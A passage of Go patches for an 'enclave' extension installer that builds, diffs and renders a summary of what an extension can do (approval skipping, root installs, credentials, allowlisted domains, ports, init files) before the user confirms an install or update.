+	for _, name := range model.KitInitSubstitutedVars {
+		if strings.HasPrefix(path, "${"+name+"}") {
+			return name
+		}
+		// Unbraced: envsubst reads the longest identifier, so $HOMEBREW is the
+		// variable HOMEBREW and not HOME followed by text.
+		if rest, ok := strings.CutPrefix(path, "$"+name); ok && !startsWithIdentChar(rest) {
+			return name
+		}
+	}
+	return ""
+}
+
+func startsWithIdentChar(s string) bool {
+	if s == "" {
+		return false
+	}
+	c := s[0]
+	return c == '_' || (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9')
+}
+
+// writesIntoProject reports whether an initFiles path lands in the user's real
+// project directory. kit-init.sh resolves the path with envsubst, so WORKDIR
+// expands to the project directory and HOME to an absolute path outside it;
+// anything else resolves relative to the project. Only a leading "/" escapes
+// it — a leading "~" does not, since the resolved path is used quoted and no
+// shell ever expands it.
+func writesIntoProject(path string) bool {
+	trimmed := strings.TrimSpace(path)
+	if trimmed == "" {
+		return false
+	}
+	switch leadingVar(trimmed) {
+	case model.KitInitWorkdirVar:
+		return true
+	case model.KitInitHomeVar:
+		return false
+	}
+	return !strings.HasPrefix(trimmed, "/")
+}
+
+// parseAllowlistFile extracts the hosts a gateway allowlist fragment names.
+// dnsmasq fragments use server=/<domain>/<ip> and address=/<domain>/<ip> to
+// widen reachability; any other directive (for example conf-file=, which
+// pulls in a whole other fragment) is returned verbatim as a directive so it
+// is never silently hidden from the capability summary.
+func parseAllowlistFile(path string) (domains []string, directives []string, err error) {
+	// #nosec G304 -- path is inside the caller's staging directory.
+	file, err := os.Open(path)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return nil, nil, nil
+		}
+		return nil, nil, err
+	}
+	defer func() { _ = file.Close() }()
+
+	scanner := bufio.NewScanner(file)
+	for scanner.Scan() {
+		line := strings.TrimSpace(scanner.Text())
+		if line == "" || strings.HasPrefix(line, "#") {
+			continue
+		}
+		matched := false
+		for _, prefix := range []string{"server=/", "address=/"} {
+			if !strings.HasPrefix(line, prefix) {
+				continue
+			}
+			matched = true
+			rest := strings.TrimPrefix(line, prefix)
+			if idx := strings.Index(rest, "/"); idx >= 0 {
+				rest = rest[:idx]
+			}
+			if rest != "" {
+				domains = append(domains, rest)
+			}
+		}
+		if !matched {
+			directives = append(directives, line)
+		}
+	}
+	return domains, directives, scanner.Err()
+}
+
+func dedupeSorted(values []string) []string {
+	trimmed := make([]string, 0, len(values))
+	for _, value := range values {
+		if value = strings.TrimSpace(value); value != "" {
+			trimmed = append(trimmed, value)
+		}
+	}
+	result := util.Dedupe(trimmed)
+	sort.Strings(result)
+	return result
+}
+
+// allPorts folds provider OAuth callback ports into the container ports
+// declared under `ports:`.
+func (c capabilities) allPorts() []string {
+	ports := intsToStrings(c.Spec.Ports)
+	for _, provider := range c.Spec.Providers {
+		ports = append(ports, provider.OAuthPorts...)
+	}
+	return dedupeSorted(ports)
+}
+
+func describeProvider(p config.SpecProviderSummary) string {
+	parts := []string{p.Name}
+	if len(p.AuthFiles) > 0 {
+		parts = append(parts, "authFiles="+strings.Join(p.AuthFiles, "+"))
+	}
+	if p.AuthSession {
+		mode := p.AuthSessionMode
+		if mode == "" {
+			mode = "any"
+		}
+		parts = append(parts, "authSession="+mode)
+	}
+	if len(p.OAuthPorts) > 0 {
+		parts = append(parts, "oauthPorts="+strings.Join(p.OAuthPorts, "+"))
+	}
+	if p.SecurestorageDirEnv != "" {
+		parts = append(parts, "securestorageDirEnv="+p.SecurestorageDirEnv)
+	}
+	return strings.Join(parts, " ")
+}
+
+func describeCredentialSource(c config.SpecCredentialSource) string {
+	parts := []string{c.ID}
+	if len(c.Env) > 0 {
+		parts = append(parts, "env="+strings.Join(c.Env, "+"))
+	}
+	if c.FilePath != "" {
+		parts = append(parts, "file="+c.FilePath)
+	}
+	if c.FileParser != "" {
+		parts = append(parts, "parser="+c.FileParser)
+	}
+	if c.ReleaseHeader != "" {
+		parts = append(parts, "header="+c.ReleaseHeader)
+	}
+	if len(c.ReleaseHosts) > 0 {
+		parts = append(parts, "hosts="+strings.Join(c.ReleaseHosts, "+"))
+	}
+	return strings.Join(parts, " ")
+}
+
+func describeInitFile(n config.SpecInitFileSummary) string {
+	parts := []string{n.Path}
+	if n.OnlyIfMissing {
+		parts = append(parts, "onlyIfMissing")
+	}
+	if writesIntoProject(n.Path) {
+		parts = append(parts, "writesProject")
+	}
+	return strings.Join(parts, " ")
+}
+
+func mapDescribe[T any](items []T, describe func(T) string) []string {
+	out := make([]string, 0, len(items))
+	for _, item := range items {
+		out = append(out, describe(item))
+	}
+	return out
+}
+
+func joinWithPlus(values []string) string {
+	if len(values) == 0 {
+		return ""
+	}
+	parts := make([]string, 0, len(values))
+	for _, value := range values {
+		parts = append(parts, "+"+value)
+	}
+	return strings.Join(parts, ", ")
+}

--- a/internal/extinstall/capabilities.go
+++ b/internal/extinstall/capabilities.go
@@ -13,6 +13,7 @@ import (
 	"os"
 	"path/filepath"
 	"sort"
+	"strconv"
 	"strings"
 
 	"enclave/internal/config"
@@ -51,16 +52,15 @@ func (c capabilities) yoloActive() bool {
 	return c.Spec.YoloFlag != "" && c.Spec.YoloEnabled
 }
 
-// entrypointDirs are the startup-script directories, by kind, in the order the
-// container runs them. The rule is entrypoint.sh's, not config's: it sources
-// entrypoint.d from the selected tool's directory alone, and
-// feature-entrypoint.d from each enabled feature's, so neither kind runs the
-// other's directory.
-func entrypointDirs(kind model.ExtensionKind) []string {
+// entrypointDir is the startup-script directory this kind's extensions ship.
+// The rule is entrypoint.sh's, not config's: it sources entrypoint.d from the
+// selected tool's directory alone, and feature-entrypoint.d from each enabled
+// feature's, so neither kind runs the other's directory.
+func entrypointDir(kind model.ExtensionKind) string {
 	if kind == model.KindTool {
-		return []string{model.ToolEntrypointDir}
+		return model.ToolEntrypointDir
 	}
-	return []string{model.FeatureEntrypointDir}
+	return model.FeatureEntrypointDir
 }
 
 // inspect summarizes a staged extension directory.
@@ -119,8 +119,7 @@ func scanExtensionTree(dir string, kind model.ExtensionKind) (extensionTree, err
 		homePrefix      = model.ExtensionFilesDir + "/" + model.ExtensionFilesHomeDir + "/"
 	)
 	tree := extensionTree{}
-	entrypoints := entrypointDirs(kind)
-	scripts := map[string][]string{}
+	entrypoint := entrypointDir(kind)
 
 	err := walkExtensionEntries(dir, func(rel string, _ string, entry fs.DirEntry) error {
 		if entry.IsDir() {
@@ -151,12 +150,10 @@ func scanExtensionTree(dir string, kind model.ExtensionKind) (extensionTree, err
 		if name, ok := immediateChild(rel, skillsPrefix); ok {
 			tree.Skills = append(tree.Skills, name)
 		}
-		for _, sub := range entrypoints {
-			// entrypoint.sh globs "*.sh", so anything else in the directory —
-			// a README, a helper data file — is never sourced.
-			if name, ok := immediateChild(rel, sub+"/"); ok && strings.HasSuffix(name, ".sh") {
-				scripts[sub] = append(scripts[sub], sub+"/"+name)
-			}
+		// entrypoint.sh globs "*.sh", so anything else in the directory — a
+		// README, a helper data file — is never sourced.
+		if name, ok := immediateChild(rel, entrypoint+"/"); ok && strings.HasSuffix(name, ".sh") {
+			tree.StartupScripts = append(tree.StartupScripts, entrypoint+"/"+name)
 		}
 		if name, ok := strings.CutPrefix(rel, workspacePrefix); ok {
 			tree.WorkspaceFiles = append(tree.WorkspaceFiles, name)
@@ -170,13 +167,9 @@ func scanExtensionTree(dir string, kind model.ExtensionKind) (extensionTree, err
 		return extensionTree{}, err
 	}
 
-	// Startup scripts stay grouped by entrypoint directory, in the order the
-	// kind runs them; everything else is a plain sorted listing.
-	for _, sub := range entrypoints {
-		group := scripts[sub]
-		sort.Strings(group)
-		tree.StartupScripts = append(tree.StartupScripts, group...)
-	}
+	// entrypoint.sh sources the scripts in glob order, so they are listed
+	// sorted like everything else.
+	sort.Strings(tree.StartupScripts)
 	sort.Strings(tree.Skills)
 	sort.Strings(tree.WorkspaceFiles)
 	sort.Strings(tree.HomeFiles)
@@ -261,22 +254,16 @@ func parseAllowlistFile(path string) (domains []string, directives []string, err
 		if line == "" || strings.HasPrefix(line, "#") {
 			continue
 		}
-		matched := false
-		for _, prefix := range []string{"server=/", "address=/"} {
-			if !strings.HasPrefix(line, prefix) {
-				continue
-			}
-			matched = true
-			rest := strings.TrimPrefix(line, prefix)
-			if idx := strings.Index(rest, "/"); idx >= 0 {
-				rest = rest[:idx]
-			}
-			if rest != "" {
-				domains = append(domains, rest)
-			}
+		rest, ok := strings.CutPrefix(line, "server=/")
+		if !ok {
+			rest, ok = strings.CutPrefix(line, "address=/")
 		}
-		if !matched {
+		if !ok {
 			directives = append(directives, line)
+			continue
+		}
+		if domain, _, _ := strings.Cut(rest, "/"); domain != "" {
+			domains = append(domains, domain)
 		}
 	}
 	return domains, directives, scanner.Err()
@@ -295,9 +282,18 @@ func dedupeSorted(values []string) []string {
 }
 
 // allPorts folds provider OAuth callback ports into the container ports
-// declared under `ports:`.
+// declared under `ports:`. A declared port is only bound on the host when it
+// sets publish, so that is carried into the rendering rather than left to the
+// port number, which says nothing about it.
 func (c capabilities) allPorts() []string {
-	ports := intsToStrings(c.Spec.Ports)
+	ports := make([]string, 0, len(c.Spec.Ports))
+	for _, port := range c.Spec.Ports {
+		text := strconv.Itoa(port.Container)
+		if port.Publish {
+			text += " (published on the host)"
+		}
+		ports = append(ports, text)
+	}
 	for _, provider := range c.Spec.Providers {
 		ports = append(ports, provider.OAuthPorts...)
 	}
@@ -347,11 +343,20 @@ func describeCredentialSource(c config.SpecCredentialSource) string {
 
 func describeInitFile(n config.SpecInitFileSummary) string {
 	parts := []string{n.Path}
+	if n.Mode != "" {
+		parts = append(parts, "mode="+n.Mode)
+	}
 	if n.OnlyIfMissing {
 		parts = append(parts, "onlyIfMissing")
 	}
 	if writesIntoProject(n.Path) {
 		parts = append(parts, "writesProject")
+	}
+	// The content is written on every start, so a rewrite behind an unchanged
+	// path is a change to what the extension does. The digest reports it
+	// without pulling an arbitrarily long file into the summary.
+	if n.ContentDigest != "" {
+		parts = append(parts, "content="+n.ContentDigest)
 	}
 	return strings.Join(parts, " ")
 }

--- a/internal/extinstall/capabilities_diff.go
+++ b/internal/extinstall/capabilities_diff.go
@@ -1,0 +1,147 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"fmt"
+
+	"enclave/internal/model"
+)
+
+// diffCapabilities reports what an update would change about what an extension
+// can do, gained capabilities first. Every list- or count-valued field on
+// capabilities participates.
+func diffCapabilities(before capabilities, after capabilities) []string {
+	var changes []string
+	beforeYolo, afterYolo := before.yoloActive(), after.yoloActive()
+	switch {
+	case afterYolo && !beforeYolo:
+		changes = append(changes, fmt.Sprintf("now skips approval prompts (%s runs the agent unattended)", after.Spec.YoloFlag))
+	case !afterYolo && beforeYolo:
+		changes = append(changes, fmt.Sprintf("no longer skips approval prompts (drops %s)", before.Spec.YoloFlag))
+	case afterYolo && beforeYolo && before.Spec.YoloFlag != after.Spec.YoloFlag:
+		changes = append(changes, fmt.Sprintf("changes the approval-skipping flag from %s to %s", before.Spec.YoloFlag, after.Spec.YoloFlag))
+	}
+	changes = append(changes, diffFlag(before.Spec.NeedsRoot, after.Spec.NeedsRoot,
+		"now installs as root", "no longer installs as root")...)
+	changes = append(changes, diffFlag(before.InstallScript, after.InstallScript,
+		"adds "+model.InstallScriptFilename, "drops "+model.InstallScriptFilename)...)
+	changes = append(changes, diffFlag(before.UpdateProbe, after.UpdateProbe,
+		"adds "+model.CheckUpdateScriptFilename, "drops "+model.CheckUpdateScriptFilename)...)
+	changes = append(changes, diffCount("install command", before.Spec.InstallCommands, after.Spec.InstallCommands)...)
+	changes = append(changes, diffCount("root install command", before.Spec.InstallCommandsAsRoot, after.Spec.InstallCommandsAsRoot)...)
+	changes = append(changes, diffFlag(before.IgnoredGoDir, after.IgnoredGoDir,
+		"adds ignored go/ handlers (require recompilation)", "drops go/ handlers")...)
+	changes = append(changes, diffScalar("entrypoint override", before.Spec.EntrypointOverride, after.Spec.EntrypointOverride)...)
+	changes = append(changes, diffList("startup script", before.StartupScripts, after.StartupScripts)...)
+	changes = append(changes, diffList("startup command", before.Spec.StartupCommands, after.Spec.StartupCommands)...)
+	changes = append(changes, diffList("environment var", before.Spec.EnvironmentVars, after.Spec.EnvironmentVars)...)
+	changes = append(changes, diffList("allowlist domain", before.AllowDomains, after.AllowDomains)...)
+	changes = append(changes, diffList("allowlist directive", before.AllowlistDirectives, after.AllowlistDirectives)...)
+	changes = append(changes, diffList("denied domain", before.Spec.DeniedDomains, after.Spec.DeniedDomains)...)
+	changes = append(changes, diffList("port", before.allPorts(), after.allPorts())...)
+	changes = append(changes, diffList("credential", before.Spec.CredentialEnv, after.Spec.CredentialEnv)...)
+	changes = append(changes, diffList("credential grant",
+		mapDescribe(before.Spec.CredentialSources, describeCredentialSource),
+		mapDescribe(after.Spec.CredentialSources, describeCredentialSource))...)
+	changes = append(changes, diffList("proxy-managed alias", before.Spec.ProxyManaged, after.Spec.ProxyManaged)...)
+	changes = append(changes, diffList("provider",
+		mapDescribe(before.Spec.Providers, describeProvider),
+		mapDescribe(after.Spec.Providers, describeProvider))...)
+	beforeHosts, afterHosts := before.Spec.HostExposure, after.Spec.HostExposure
+	changes = append(changes, diffList("passthrough path", beforeHosts.PassthroughPaths, afterHosts.PassthroughPaths)...)
+	changes = append(changes, diffScalar("host config dir", beforeHosts.HostConfigDir, afterHosts.HostConfigDir)...)
+	changes = append(changes, diffScalar("host credentials file", beforeHosts.HostCredentialsFile, afterHosts.HostCredentialsFile)...)
+	changes = append(changes, diffScalar("host oauth json", beforeHosts.HostOAuthJSON, afterHosts.HostOAuthJSON)...)
+	changes = append(changes, diffScalar("mixin config dir", beforeHosts.MixinConfigDir, afterHosts.MixinConfigDir)...)
+	changes = append(changes, diffList("mixin auth file", beforeHosts.MixinAuthFiles, afterHosts.MixinAuthFiles)...)
+	changes = append(changes, diffList("apt package", before.Spec.AptPackages, after.Spec.AptPackages)...)
+	changes = append(changes, diffList("skill", before.Skills, after.Skills)...)
+	changes = append(changes, diffList("init file",
+		mapDescribe(before.Spec.InitFiles, describeInitFile),
+		mapDescribe(after.Spec.InitFiles, describeInitFile))...)
+	changes = append(changes, diffList("workspace file", before.WorkspaceFiles, after.WorkspaceFiles)...)
+	changes = append(changes, diffList("home file", before.HomeFiles, after.HomeFiles)...)
+	if before.Files != after.Files || before.Bytes != after.Bytes {
+		changes = append(changes, fmt.Sprintf("staged content changes from %d files/%d bytes to %d files/%d bytes",
+			before.Files, before.Bytes, after.Files, after.Bytes))
+	}
+	return changes
+}
+
+// diffFlag reports a gained or lost boolean capability, phrased by the caller
+// because "adds"/"drops" reads wrong for some of them.
+func diffFlag(before bool, after bool, added string, dropped string) []string {
+	switch {
+	case after && !before:
+		return []string{added}
+	case before && !after:
+		return []string{dropped}
+	default:
+		return nil
+	}
+}
+
+// diffScalar reports a change to a single string-valued field: a newly set
+// value, a cleared one, or a change from one value to another.
+func diffScalar(label string, before string, after string) []string {
+	if before == after {
+		return nil
+	}
+	switch {
+	case before == "":
+		return []string{fmt.Sprintf("adds %s %q", label, after)}
+	case after == "":
+		return []string{fmt.Sprintf("drops %s %q", label, before)}
+	default:
+		return []string{fmt.Sprintf("changes %s from %q to %q", label, before, after)}
+	}
+}
+
+func diffCount(label string, before int, after int) []string {
+	switch {
+	case after > before:
+		return []string{fmt.Sprintf("adds %d %s(s) (%d -> %d)", after-before, label, before, after)}
+	case after < before:
+		return []string{fmt.Sprintf("drops %d %s(s) (%d -> %d)", before-after, label, before, after)}
+	default:
+		return nil
+	}
+}
+
+func diffList(label string, before []string, after []string) []string {
+	beforeSet := map[string]struct{}{}
+	for _, value := range before {
+		beforeSet[value] = struct{}{}
+	}
+	afterSet := map[string]struct{}{}
+	for _, value := range after {
+		afterSet[value] = struct{}{}
+	}
+
+	var changes []string
+	for _, value := range dedupeSorted(after) {
+		if _, ok := beforeSet[value]; !ok {
+			changes = append(changes, fmt.Sprintf("adds %s %s", label, value))
+		}
+	}
+	for _, value := range dedupeSorted(before) {
+		if _, ok := afterSet[value]; !ok {
+			changes = append(changes, fmt.Sprintf("drops %s %s", label, value))
+		}
+	}
+	return changes
+}
+
+func intsToStrings(values []int) []string {
+	result := make([]string, 0, len(values))
+	for _, value := range values {
+		result = append(result, fmt.Sprint(value))
+	}
+	return result
+}

--- a/internal/extinstall/capabilities_diff.go
+++ b/internal/extinstall/capabilities_diff.go
@@ -9,6 +9,7 @@ package extinstall
 
 import (
 	"fmt"
+	"slices"
 
 	"enclave/internal/model"
 )
@@ -33,11 +34,14 @@ func diffCapabilities(before capabilities, after capabilities) []string {
 		"adds "+model.InstallScriptFilename, "drops "+model.InstallScriptFilename)...)
 	changes = append(changes, diffFlag(before.UpdateProbe, after.UpdateProbe,
 		"adds "+model.CheckUpdateScriptFilename, "drops "+model.CheckUpdateScriptFilename)...)
-	changes = append(changes, diffCount("install command", before.Spec.InstallCommands, after.Spec.InstallCommands)...)
+	changes = append(changes, diffList("install command", before.Spec.InstallCommands, after.Spec.InstallCommands)...)
 	changes = append(changes, diffCount("root install command", before.Spec.InstallCommandsAsRoot, after.Spec.InstallCommandsAsRoot)...)
 	changes = append(changes, diffFlag(before.IgnoredGoDir, after.IgnoredGoDir,
 		"adds ignored go/ handlers (require recompilation)", "drops go/ handlers")...)
 	changes = append(changes, diffScalar("entrypoint override", before.Spec.EntrypointOverride, after.Spec.EntrypointOverride)...)
+	changes = append(changes, diffScalar("continue args", before.Spec.ContinueArgs, after.Spec.ContinueArgs)...)
+	changes = append(changes, diffScalar("resume args", before.Spec.ResumeArgs, after.Spec.ResumeArgs)...)
+	changes = append(changes, diffScalar("post-start IDE launch", before.Spec.PostStartOpenIDE, after.Spec.PostStartOpenIDE)...)
 	changes = append(changes, diffList("startup script", before.StartupScripts, after.StartupScripts)...)
 	changes = append(changes, diffList("startup command", before.Spec.StartupCommands, after.Spec.StartupCommands)...)
 	changes = append(changes, diffList("environment var", before.Spec.EnvironmentVars, after.Spec.EnvironmentVars)...)
@@ -115,33 +119,16 @@ func diffCount(label string, before int, after int) []string {
 }
 
 func diffList(label string, before []string, after []string) []string {
-	beforeSet := map[string]struct{}{}
-	for _, value := range before {
-		beforeSet[value] = struct{}{}
-	}
-	afterSet := map[string]struct{}{}
-	for _, value := range after {
-		afterSet[value] = struct{}{}
-	}
-
 	var changes []string
 	for _, value := range dedupeSorted(after) {
-		if _, ok := beforeSet[value]; !ok {
+		if !slices.Contains(before, value) {
 			changes = append(changes, fmt.Sprintf("adds %s %s", label, value))
 		}
 	}
 	for _, value := range dedupeSorted(before) {
-		if _, ok := afterSet[value]; !ok {
+		if !slices.Contains(after, value) {
 			changes = append(changes, fmt.Sprintf("drops %s %s", label, value))
 		}
 	}
 	return changes
-}
-
-func intsToStrings(values []int) []string {
-	result := make([]string, 0, len(values))
-	for _, value := range values {
-		result = append(result, fmt.Sprint(value))
-	}
-	return result
 }

--- a/internal/extinstall/capabilities_render.go
+++ b/internal/extinstall/capabilities_render.go
@@ -16,15 +16,12 @@ import (
 )
 
 // render writes the capability summary shown before an install is confirmed.
-// Lines with nothing to report are omitted.
-func (c capabilities) render(w io.Writer, header string) {
-	_, _ = fmt.Fprintf(w, "%s\n\n", header)
-	row := func(label string, value string) {
-		if value == "" {
-			return
-		}
-		_, _ = fmt.Fprintf(w, "  %-19s %s\n", label, value)
-	}
+// Lines with nothing to report are omitted. The caller has already opened the
+// section, so this renders the body alone.
+func (c capabilities) render(w io.Writer, style Style, source string) {
+	rows := &rowSet{}
+	row := rows.add
+	row("source", source)
 
 	install := ""
 	switch {
@@ -127,5 +124,9 @@ func (c capabilities) render(w io.Writer, header string) {
 	}
 	if c.Files > 0 {
 		row("content", fmt.Sprintf("%d files, %d bytes", c.Files, c.Bytes))
+	}
+	rows.render(w, style)
+	if !rows.empty() {
+		_, _ = fmt.Fprintln(w)
 	}
 }

--- a/internal/extinstall/capabilities_render.go
+++ b/internal/extinstall/capabilities_render.go
@@ -1,0 +1,131 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"fmt"
+	"io"
+	"strings"
+
+	"enclave/internal/model"
+)
+
+// render writes the capability summary shown before an install is confirmed.
+// Lines with nothing to report are omitted.
+func (c capabilities) render(w io.Writer, header string) {
+	_, _ = fmt.Fprintf(w, "%s\n\n", header)
+	row := func(label string, value string) {
+		if value == "" {
+			return
+		}
+		_, _ = fmt.Fprintf(w, "  %-19s %s\n", label, value)
+	}
+
+	install := ""
+	switch {
+	case c.InstallScript && c.Spec.NeedsRoot:
+		install = model.InstallScriptFilename + " (needsRoot: true)"
+	case c.InstallScript:
+		install = model.InstallScriptFilename
+	case c.Spec.InstallCommands > 0:
+		install = fmt.Sprintf("commands.install (%d)", c.Spec.InstallCommands)
+		if c.Spec.InstallCommandsAsRoot > 0 {
+			install = fmt.Sprintf("commands.install (%d, %d as root)", c.Spec.InstallCommands, c.Spec.InstallCommandsAsRoot)
+		}
+		if c.Spec.NeedsRoot {
+			install += " (needsRoot: true)"
+		}
+	case c.Spec.NeedsRoot:
+		install = "needsRoot: true"
+	}
+	row("install script", install)
+	updateProbe := ""
+	if c.UpdateProbe {
+		updateProbe = model.CheckUpdateScriptFilename + " (runs in a container on each automatic update check)"
+	}
+	row("update probe", updateProbe)
+	row("entrypoint override", c.Spec.EntrypointOverride)
+	skipsApproval := ""
+	if c.yoloActive() {
+		skipsApproval = fmt.Sprintf("%s (agent executes actions on its own, without asking you to approve each one)", c.Spec.YoloFlag)
+	}
+	row("skips approval", skipsApproval)
+
+	startup := append([]string{}, c.StartupScripts...)
+	if len(c.Spec.StartupCommands) > 0 {
+		startup = append(startup, fmt.Sprintf("commands.startup (%d)", len(c.Spec.StartupCommands)))
+	}
+	row("startup scripts", strings.Join(startup, ", "))
+	row("environment vars", strings.Join(c.Spec.EnvironmentVars, ", "))
+	row("allowlist domains", joinWithPlus(c.AllowDomains))
+	row("allowlist directives", strings.Join(c.AllowlistDirectives, ", "))
+	row("denied domains", strings.Join(c.Spec.DeniedDomains, ", "))
+	row("ports", strings.Join(c.allPorts(), ", "))
+	envAliases := strings.Join(c.Spec.CredentialEnv, ", ")
+	if envAliases != "" {
+		envAliases += " (env alias)"
+	}
+	row("credentials", envAliases)
+	for _, source := range c.Spec.CredentialSources {
+		if source.ReleaseHeader == "" {
+			continue
+		}
+		row("credential → host", fmt.Sprintf("%s -> %s (header %s)", source.ID, strings.Join(source.ReleaseHosts, ", "), source.ReleaseHeader))
+	}
+	for _, source := range c.Spec.CredentialSources {
+		if source.FilePath == "" {
+			continue
+		}
+		note := fmt.Sprintf("%s: %s", source.ID, source.FilePath)
+		if source.FileParser != "" {
+			note += " (" + source.FileParser + ")"
+		}
+		row("credential file", note)
+	}
+	row("proxy-managed", strings.Join(c.Spec.ProxyManaged, ", "))
+	for _, provider := range c.Spec.Providers {
+		row("provider", describeProvider(provider))
+	}
+	row("passthrough paths", strings.Join(c.Spec.HostExposure.PassthroughPaths, ", "))
+	row("host config dir", c.Spec.HostExposure.HostConfigDir)
+	row("host credentials file", c.Spec.HostExposure.HostCredentialsFile)
+	row("host oauth json", c.Spec.HostExposure.HostOAuthJSON)
+	row("mixin config dir", c.Spec.HostExposure.MixinConfigDir)
+	row("mixin auth files", strings.Join(c.Spec.HostExposure.MixinAuthFiles, ", "))
+	row("apt packages", strings.Join(c.Spec.AptPackages, ", "))
+	row("skills", strings.Join(c.Skills, ", "))
+	for _, file := range c.Spec.InitFiles {
+		note := file.Path
+		switch {
+		case writesIntoProject(file.Path) && !file.OnlyIfMissing:
+			note += " (overwrites in the project on every start)"
+		case writesIntoProject(file.Path):
+			note += " (seeded once in the project)"
+		}
+		row("init files", note)
+	}
+	workspaceFiles := strings.Join(c.WorkspaceFiles, ", ")
+	if workspaceFiles != "" {
+		workspaceFiles += " (seeded into the project at start, never overwrites)"
+	}
+	row("workspace files", workspaceFiles)
+	homeFiles := strings.Join(c.HomeFiles, ", ")
+	if homeFiles != "" {
+		homeFiles += " (baked into $HOME at build)"
+	}
+	row("home files", homeFiles)
+	if c.ShadowsBuiltin {
+		row("shadows built-in", "yes")
+	}
+	if c.IgnoredGoDir {
+		row("ignored", "go/ handlers (require recompilation)")
+	}
+	if c.Files > 0 {
+		row("content", fmt.Sprintf("%d files, %d bytes", c.Files, c.Bytes))
+	}
+}

--- a/internal/extinstall/capabilities_render.go
+++ b/internal/extinstall/capabilities_render.go
@@ -29,10 +29,10 @@ func (c capabilities) render(w io.Writer, style Style, source string) {
 		install = model.InstallScriptFilename + " (needsRoot: true)"
 	case c.InstallScript:
 		install = model.InstallScriptFilename
-	case c.Spec.InstallCommands > 0:
-		install = fmt.Sprintf("commands.install (%d)", c.Spec.InstallCommands)
+	case len(c.Spec.InstallCommands) > 0:
+		install = fmt.Sprintf("commands.install (%d)", len(c.Spec.InstallCommands))
 		if c.Spec.InstallCommandsAsRoot > 0 {
-			install = fmt.Sprintf("commands.install (%d, %d as root)", c.Spec.InstallCommands, c.Spec.InstallCommandsAsRoot)
+			install = fmt.Sprintf("commands.install (%d, %d as root)", len(c.Spec.InstallCommands), c.Spec.InstallCommandsAsRoot)
 		}
 		if c.Spec.NeedsRoot {
 			install += " (needsRoot: true)"
@@ -47,6 +47,11 @@ func (c capabilities) render(w io.Writer, style Style, source string) {
 	}
 	row("update probe", updateProbe)
 	row("entrypoint override", c.Spec.EntrypointOverride)
+	// Session args are appended to the agent's own argv, so they are reported
+	// next to the entrypoint rather than folded into "skips approval": what
+	// they grant depends on the flags they carry.
+	row("continue args", c.Spec.ContinueArgs)
+	row("resume args", c.Spec.ResumeArgs)
 	skipsApproval := ""
 	if c.yoloActive() {
 		skipsApproval = fmt.Sprintf("%s (agent executes actions on its own, without asking you to approve each one)", c.Spec.YoloFlag)
@@ -88,6 +93,11 @@ func (c capabilities) render(w io.Writer, style Style, source string) {
 	for _, provider := range c.Spec.Providers {
 		row("provider", describeProvider(provider))
 	}
+	postStart := ""
+	if c.Spec.PostStartOpenIDE != "" {
+		postStart = c.Spec.PostStartOpenIDE + " (launched on the host once the container is running; the session runs detached)"
+	}
+	row("post-start", postStart)
 	row("passthrough paths", strings.Join(c.Spec.HostExposure.PassthroughPaths, ", "))
 	row("host config dir", c.Spec.HostExposure.HostConfigDir)
 	row("host credentials file", c.Spec.HostExposure.HostCredentialsFile)
@@ -98,6 +108,9 @@ func (c capabilities) render(w io.Writer, style Style, source string) {
 	row("skills", strings.Join(c.Skills, ", "))
 	for _, file := range c.Spec.InitFiles {
 		note := file.Path
+		if file.Mode != "" {
+			note += " mode " + file.Mode
+		}
 		switch {
 		case writesIntoProject(file.Path) && !file.OnlyIfMissing:
 			note += " (overwrites in the project on every start)"

--- a/internal/extinstall/capabilities_render.go
+++ b/internal/extinstall/capabilities_render.go
@@ -68,19 +68,19 @@ func (c capabilities) render(w io.Writer, style Style, source string) {
 		envAliases += " (env alias)"
 	}
 	row("credentials", envAliases)
-	for _, source := range c.Spec.CredentialSources {
-		if source.ReleaseHeader == "" {
+	for _, cred := range c.Spec.CredentialSources {
+		if cred.ReleaseHeader == "" {
 			continue
 		}
-		row("credential → host", fmt.Sprintf("%s -> %s (header %s)", source.ID, strings.Join(source.ReleaseHosts, ", "), source.ReleaseHeader))
+		row("credential → host", fmt.Sprintf("%s -> %s (header %s)", cred.ID, strings.Join(cred.ReleaseHosts, ", "), cred.ReleaseHeader))
 	}
-	for _, source := range c.Spec.CredentialSources {
-		if source.FilePath == "" {
+	for _, cred := range c.Spec.CredentialSources {
+		if cred.FilePath == "" {
 			continue
 		}
-		note := fmt.Sprintf("%s: %s", source.ID, source.FilePath)
-		if source.FileParser != "" {
-			note += " (" + source.FileParser + ")"
+		note := fmt.Sprintf("%s: %s", cred.ID, cred.FilePath)
+		if cred.FileParser != "" {
+			note += " (" + cred.FileParser + ")"
 		}
 		row("credential file", note)
 	}

--- a/internal/extinstall/capabilities_test.go
+++ b/internal/extinstall/capabilities_test.go
@@ -114,7 +114,7 @@ func TestInspectReportsCapabilities(t *testing.T) {
 	if len(caps.Skills) != 1 || caps.Skills[0] != "review" {
 		t.Errorf("Skills = %v, want the staged skill name", caps.Skills)
 	}
-	if len(caps.Spec.Ports) != 1 || caps.Spec.Ports[0] != 8080 {
+	if len(caps.Spec.Ports) != 1 || caps.Spec.Ports[0].Container != 8080 {
 		t.Errorf("Ports = %v", caps.Spec.Ports)
 	}
 	if len(caps.Spec.CredentialEnv) != 1 || caps.Spec.CredentialEnv[0] != "ACME_TOKEN" {
@@ -132,7 +132,7 @@ func TestInspectReportsCapabilities(t *testing.T) {
 	if caps.Spec.EntrypointOverride != "foo --serve" {
 		t.Errorf("EntrypointOverride = %q, want %q", caps.Spec.EntrypointOverride, "foo --serve")
 	}
-	if len(caps.Spec.EnvironmentVars) != 1 || caps.Spec.EnvironmentVars[0] != "NODE_TLS_REJECT_UNAUTHORIZED" {
+	if len(caps.Spec.EnvironmentVars) != 1 || caps.Spec.EnvironmentVars[0] != "NODE_TLS_REJECT_UNAUTHORIZED=0" {
 		t.Errorf("EnvironmentVars = %v", caps.Spec.EnvironmentVars)
 	}
 	if len(caps.Spec.CredentialSources) != 1 {
@@ -190,7 +190,7 @@ func TestRenderIncludesEveryReportedCapability(t *testing.T) {
 	for _, want := range []string{
